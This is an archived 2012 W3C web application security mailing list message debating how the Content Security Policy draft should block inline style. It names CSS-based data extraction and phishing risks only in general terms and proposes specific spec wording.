- From: Boris Zbarsky <bzbarsky@MIT.EDU>
- Date: Thu, 20 Sep 2012 13:46:27 -0400
- To: Adam Barth <w3c@adambarth.com>
- CC: public-webappsec@w3.org
On 9/20/12 1:19 PM, Adam Barth wrote: > 1) CSS3 attribute selectors. These are scary because they can be used > to extract information from the page, such as data typed into <input> > elements. Blocking the <style> element is enough to mitigate this > risk. For now. Until people add selectors to inline styles. There have been several proposals for that. (On a side note, it's not clear to me how attribute selectors would lead data typed into an <input>, unless the page has script stashing the data into an attribute somewhere....) > 2) Phishing. If an attacker can inject elements into a page with > arbitrary style, the attacker can completely change the appearance of > the page and, for example, make the page show a login screen. This > attack is more powerful than a traditional phishing attack because the > browser's location bar will still show the URL of the real web site > (including any EV indicators or whatnot). To mitigate this risk, we > need to block both <style> and @style. Agreed. > For reference, here's the current text from the spec: > > ---8<--- > If 'unsafe-inline' is not in allowed style sources: > > * Whenever the user agent would apply style from a style element, > instead the user agent must ignore the style. > * Whenever the user agent would apply style from a style attribute, > instead the user agent must ignore the style. > > Note: These restrictions on inline do not prevent the user agent from > applying style from an external stylesheet (e.g., found via <link > rel="stylesheet">). The user agent is also not prevented from applying > style from Cascading Style Sheets Object Model (CSSOM). [CSSOM] > --->8--- > > Do you have a specific change to the text that you'd like to propose? Yes. I think the second bullet point should be more like: * Whenever the user agent would apply style from a CSS declaration block that correspond's to an element's inline style the user agent must ignore the style. It's still a bit weird because http://dev.w3.org/csswg/css-style-attr/ is all about syntax and then acting "as if" there were a rule but never comes out and says "there is a declaration block here". The behavior I want would be a lot easier to define if it did... Also, I'm still not sure what the "not prevented" bit quoted above about the CSSOM really means. Does it mean that if I link an external stylesheet and then modify its CSSOM the modifications should affect the styles that sheet applied? If so, agreed. Does it mean that if I have a <style> element and then I modify its CSSOM the modifications should affect the styles applied by the sheet? This one I'm not quite sure about... -Boris
Received on Thursday, 20 September 2012 17:46:56 UTC